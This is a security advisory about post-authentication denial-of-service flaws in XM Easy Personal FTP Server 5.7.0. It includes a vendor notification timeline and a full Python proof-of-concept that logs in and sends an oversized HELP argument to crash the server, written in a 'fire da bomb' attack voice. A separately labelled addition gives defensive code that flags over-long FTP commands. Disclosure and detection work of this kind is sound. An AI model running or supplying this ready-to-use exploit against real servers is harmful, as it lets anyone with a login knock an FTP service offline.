XM Easy Personal FTP Server Multiple DoS vulnerabilities

Credits: NeerajT of Nevis Labs
         http://www.nevisnetworks.com/services.php?id=10
Date of Discovery: 14-May-2009
Vendor: Dxmsoft
URL: http://www.dxm2008.com/
Affected: XM Easy Personal FTP Server 5.7.0
          Earlier versions may also be affected

Overview:
XM Easy Personal FTP Server is an easy-to-use FTP server application.
Multiple denial-of-service vulnerabilities exist in XM Personal FTP Server
that cause the application to crash when a long list of arguments is sent
to certain FTP commands post authentication.

Details:
The DoS vulnerability exists because the application fails to handle large
parameter values sent to certain FTP commands like HELP or TYPE. When a long
value (> 4700 bytes) is passed as a parameter to these commands, the FTP
server cannot process it and crashes. Note that this is a post-authentication
vulnerability, so a user must be logged in to exploit it. No registers are
overwritten, hence remote code execution may not be possible.

Severity: High

Solution:
No patches available from vendor
No workaround is available at this time

Vendor Communication Timelines:
05.14.2009 - Vulnerability Discovered
05.15.2009 - Vendor Notified
05.20.2009 - No Response, Vendor Notified again
06.05.2009 - No Ack from Vendor, Public Disclosure

PoC: Python Exploit
-----------------------------------------------------
#!/usr/bin/python
#
# ::::::::::::::::::::::::::::::[neeraj(.)thakar(at)nevisnetworks(.)com]
#
# [-] What:....[ XM Easy Personal FTP Server 5.7.0 ].....
# [-] Where:...[ http://www.dxm2008.com ]................
# [-] When:....[ 14-May-2009 ]...........................
# [-] Who:.....[ NeerajT | neeraj(.)thakar(at)nevisnetworks(.)com ]....
# [-] How:.....[
#       A Denial of service vulnerability exists in XM
#       Personal FTP Server that causes the application to
#       crash when a long list of arguments is sent to
#       certain FTP commands post authentication..........]
# [-] Thankz:..[ Jambalaya, Xin and Chintan ]............

import os
import sys
import time
from ftplib import FTP

def usage():
    print "[...XM Personal FTP Server 5.7.0 DoS Exploit...]"
    print "[.........neeraj(.)thakar(at)gmail(.)com..............]\n"
    print "Usage: ./XMPersonal_FTPServer_DoSPoC.py <server-ip> <username> <password>\n"
    print "\n Use it at your own risk ! This is just a PoC. I am not responsible for damages done by your crazy thinking.. :P\n"

# The Main function starts here..
if __name__ == "__main__":
    ftpport = '21'

    # get the args.. (script name plus three arguments are required)
    if len(sys.argv) < 4:
        usage()
        sys.exit(1)

    ftpserver = sys.argv[1]
    user = sys.argv[2]
    passwd = sys.argv[3]

    print "Connecting to "+ftpserver+" using "+user+"....",

    # Try opening a connection to the FTP server
    try:
        F = FTP(ftpserver)
        F.timeout = 3
        if F:
            print 'Connected !'
    except:
        print "\nCould not connect to the Server :(\n"
        sys.exit(1)

    #Lets create the Buffer..
    crap = "A" * 5000

    # Creat'in da'bomb
    dabomb = 'HELP '+crap

    print "Press any key to login.."
    ch = sys.stdin.read(1)

    # Lets login
    try:
        F.login(user, passwd)
    except:
        print "Oops.. Looks like you forgot to create a login !!\n"
        F.quit()
        sys.exit(1)

    print "Target Locked, Press any key to fire..",
    ch = sys.stdin.read(1)

    print 'Sendin Da\'Bomb..'
    try:
        F.sendcmd(dabomb)
    except:
        print 'Target destroyed !! Mission successfull..!'

    print 'Returning to base..'
    F.close()
    sys.exit(0)
-----------------------------------------------------
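
Detection example (added here; not part of the original advisory or the vendor's code): since no patch or workaround is listed, one option is to inspect FTP control-channel traffic in front of the server and flag over-long command lines such as the HELP/TYPE parameters described under Details. The 512-byte limit, the class and function names, and the sample segments are assumptions constructed for illustration.

```python
MAX_LINE_LEN = 512  # assumed site policy, not a value from the advisory


class FtpCommandInspector:
    """Reassemble one session's client-to-server bytes into FTP command
    lines and report any line longer than max_len."""

    def __init__(self, max_len=MAX_LINE_LEN):
        self.max_len = max_len
        self.buf = b""
        self.skipping = False  # True while dropping the tail of a reported line

    def feed(self, segment):
        """Consume one TCP segment; return the alerts it produced."""
        alerts = []
        self.buf += segment
        while b"\n" in self.buf:
            line, self.buf = self.buf.split(b"\n", 1)
            if self.skipping:
                self.skipping = False
                continue
            alerts += self._check(line.rstrip(b"\r"), partial=False)
        if self.skipping:
            self.buf = b""
        elif len(self.buf) > self.max_len:
            # Report without waiting for CRLF, so withholding the line
            # terminator neither hides the command nor grows the buffer.
            alerts += self._check(self.buf, partial=True)
            self.buf, self.skipping = b"", True
        return alerts

    def _check(self, line, partial):
        if len(line) <= self.max_len:
            return []
        verb = line.split(b" ", 1)[0][:8].upper().decode("ascii", "replace")
        return [{"verb": verb, "length": len(line), "partial": partial}]


def demo():
    """Run the inspector over constructed segments (not captured traffic)."""
    segments = [b"USER demo\r\nPASS demo\r\nTYPE I\r\nHE",
                b"LP " + b"x" * 300, b"x" * 300 + b"\r\nNOOP\r\n"]
    insp = FtpCommandInspector()
    return [a for seg in segments for a in insp.feed(seg)]


if __name__ == "__main__":
    print(demo())
```

The same length limit can be enforced rather than only logged by dropping the session when feed() returns an alert.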